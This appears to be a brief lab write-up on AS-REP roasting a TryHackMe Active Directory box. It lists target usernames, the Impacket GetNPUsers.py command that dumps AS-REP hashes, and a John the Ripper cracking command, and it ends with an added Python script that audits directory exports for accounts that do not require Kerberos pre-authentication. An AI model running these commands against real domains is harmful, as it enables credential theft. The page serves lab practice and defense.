AS-REP Roasting using Impacket

windows, ad, kerberos, foothold

Overview

Steps

10.10.135.224 SPOOKYSEC.local

users.txt:

svc-admin@spookysec.local
James@spookysec.local
robin@spookysec.local
darkstar@spookysec.local
administrator@spookysec.local
backup@spookysec.local
paradox@spookysec.local
JAMES@spookysec.local
Robin@spookysec.local
Administrator@spookysec.local

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py SPOOKYSEC.local/ -usersfile users.txt -format john -outputfile out.john -no-pass

john --wordlist=/usr/share/wordlists/rockyou.txt out.john

Gotchas

I encountered an issue on the THM Ra box. The output says that the user doesn’t require preauth set.

[-] User buse@windcorp.thm doesn't have UF_DONT_REQUIRE_PREAUTH set

But then there were no hashes dumped. When I checked the connections in Wireshark, I saw that it's requiring pre-auth!
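The UF_DONT_REQUIRE_PREAUTH flag named in the output above is bit 0x400000 of an account's userAccountControl attribute. The following is an added example, not code from the original page or from Impacket, that audits a directory export for accounts with that bit set so they can be corrected. It assumes an LDIF-style text export; the sample entries, domain and the function names are constructed for illustration.

```python
# Added example: audit an LDIF-style export for accounts with Kerberos pre-auth disabled.
import re

# userAccountControl bits as documented by Microsoft (UF_* flags)
UF_ACCOUNTDISABLE = 0x00000002
UF_DONT_REQUIRE_PREAUTH = 0x00400000

# Constructed sample export; names, domain and values are made up for this example.
SAMPLE_LDIF = """\
dn: CN=svc-app,CN=Users,DC=example,DC=local
sAMAccountName: svc-app
userAccountControl: 4260352

dn: CN=alice,CN=Users,DC=example,DC=local
sAMAccountName: alice
userAccountControl: 512

dn: CN=old-svc,CN=Users,DC=example,DC=local
sAMAccountName: old-svc
userAccountControl: 4194818
"""

def parse_records(ldif):
    """Yield one dict (lower-cased attribute -> value) per blank-line-separated entry."""
    for block in re.split(r"\n\s*\n", ldif.strip()):
        entry = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                entry[key.strip().lower()] = value.strip()
        if entry:
            yield entry

def audit_preauth(ldif):
    """Return (enabled, disabled) account names that have UF_DONT_REQUIRE_PREAUTH set."""
    enabled, disabled = [], []
    for entry in parse_records(ldif):
        try:
            uac = int(entry["useraccountcontrol"], 0)
        except (KeyError, ValueError):
            continue  # entry has no userAccountControl, or the value is unparsable
        if uac & UF_DONT_REQUIRE_PREAUTH:
            name = entry.get("samaccountname", entry.get("dn", "?"))
            (disabled if uac & UF_ACCOUNTDISABLE else enabled).append(name)
    return enabled, disabled

if __name__ == "__main__":
    enabled, disabled = audit_preauth(SAMPLE_LDIF)
    print("pre-auth not required (enabled accounts):", enabled)
    print("pre-auth not required (disabled accounts):", disabled)
```

Accounts reported as enabled are the ones to fix first, by clearing the "Do not require Kerberos preauthentication" account option.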